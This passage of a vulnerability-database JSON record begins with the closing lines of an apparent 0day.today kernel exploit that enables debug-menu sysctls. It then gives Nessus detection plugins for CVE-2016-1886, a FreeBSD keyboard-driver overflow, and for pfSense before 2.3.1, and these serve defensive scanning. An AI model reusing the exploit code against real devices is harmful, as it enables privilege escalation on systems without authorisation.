NULL;\r\n RESOLVE(libKernelHandle, sysctlbyname);\r\n \r\n uint32_t enable;\r\n size_t size;\r\n \r\n enable = 1;\r\n size = sizeof(enable);\r\n \r\n sysctlbyname(\"machdep.rcmgr_utoken_store_mode\", NULL, NULL, &enable, size);\r\n sysctlbyname(\"machdep.rcmgr_debug_menu\", NULL, NULL, &enable, size);\r\n \r\n#ifdef DEBUG_SOCKET\r\n munmap(dump, PAGE_SIZE); \r\n#endif\r\n \r\n printfsocket(\"[+] bye\\n\");\r\n sceNetSocketClose(sock);\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-04-02] #", "sourceHref": "https://0day.today/exploit/29915", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-06T10:53:59", "description": "Incorrect signedness comparison in the ioctl(2) handler allows a\nmalicious local user to overwrite a portion of the kernel memory.\nImpact : A local user may crash the kernel, read a portion of kernel\nmemory and execute arbitrary code in kernel context. The result of\nexecuting an arbitrary kernel code is privilege escalation.", "edition": 27, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-08-12T00:00:00", "title": "FreeBSD : FreeBSD -- Buffer overflow in keyboard driver (7bbc0e8c-600a-11e6-a6c3-14dae9d210b8)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1886"], "modified": "2016-08-12T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:FreeBSD"], "id": "FREEBSD_PKG_7BBC0E8C600A11E6A6C314DAE9D210B8.NASL", "href": "https://www.tenable.com/plugins/nessus/92923", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92923);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-1886\");\n script_xref(name:\"FreeBSD\", value:\"SA-16:18.atkbd\");\n\n script_name(english:\"FreeBSD : FreeBSD -- Buffer overflow in keyboard driver (7bbc0e8c-600a-11e6-a6c3-14dae9d210b8)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Incorrect signedness comparison in the ioctl(2) handler allows a\nmalicious local user to overwrite a portion of the kernel memory.\nImpact : A local user may crash the kernel, read a portion of kernel\nmemory and execute arbitrary code in kernel context. The result of\nexecuting an arbitrary kernel code is privilege escalation.\"\n );\n # https://vuxml.freebsd.org/freebsd/7bbc0e8c-600a-11e6-a6c3-14dae9d210b8.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b43363f6\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:FreeBSD\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"FreeBSD>=10.3<10.3_3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"FreeBSD>=10.2<10.2_17\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"FreeBSD>=10.1<10.1_34\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"FreeBSD>=9.3<9.3_42\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-30T10:26:42", "description": "According to its self-reported version number, the remote pfSense\ninstall is prior to 2.3.1. It is, therefore, affected by multiple\nvulnerabilities.", "edition": 21, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-01-31T00:00:00", "title": "pfSense < 2.3.1 Multiple Vulnerabilities (SA-16_03 / SA-16-04)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2105", "CVE-2016-2107", "CVE-2016-1887", "CVE-2016-2109", "CVE-2016-2176", "CVE-2016-1886", "CVE-2016-2106"], "modified": "2018-01-31T00:00:00", "cpe": ["cpe:/a:pfsense:pfsense", "cpe:/a:bsdperimeter:pfsense"], "id": "PFSENSE_SA-16_04.NASL", "href": "https://www.tenable.com/plugins/nessus/106500", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106500);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/04/27\");\n\n script_cve_id(\n \"CVE-2016-1886\",\n \"CVE-2016-1887\",\n \"CVE-2016-2105\",\n \"CVE-2016-2106\",\n \"CVE-2016-2107\",\n \"CVE-2016-2109\",\n \"CVE-2016-2176\"\n );\n script_bugtraq_id(\n 87940,\n 89744,\n 89746,\n 89757,\n 89760,\n 90734\n );\n script_xref(name:\"EDB-ID\", value:\"39768\");\n script_xref(name:\"EDB-ID\", value:\"44212\");\n script_xref(name:\"FreeBSD\", value:\"SA-16:17.openssl\");\n script_xref(name:\"FreeBSD\", value:\"SA-16:18.atkbd\");\n script_xref(name:\"FreeBSD\", value:\"SA-16:19.sendmsg\");\n\n script_name(english:\"pfSense < 2.3.1 Multiple Vulnerabilities (SA-16_03 / SA-16-04)\");\n script_summary(english:\"Checks the version of pfSense.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote firewall host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the remote pfSense\ninstall is prior to 2.3.1. It is, therefore, affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://doc.pfsense.org/index.php/2.3.1_New_Features_and_Changes\");\n # https://www.pfsense.org/security/advisories/pfSense-SA-16_03.webgui.asc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?434aa389\");\n # https://www.pfsense.org/security/advisories/pfSense-SA-16_04.filterlog.asc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f5d9b668\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to pfSense version 2.3.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-2109\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pfsense:pfsense\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:bsdperimeter:pfsense\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"pfsense_detect.nbin\");\n script_require_keys(\"Host/pfSense\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"vcf_extras.inc\");\n\nif (!get_kb_item(\"Host/pfSense\")) audit(AUDIT_HOST_NOT, \"pfSense\");\n\napp_info = vcf::pfsense::get_app_info();\nconstraints = [\n { \"fixed_version\" : \"2.3.1\"}\n];\n\nvcf::pfsense::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE,\n flags:{xss:TRUE}\n);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}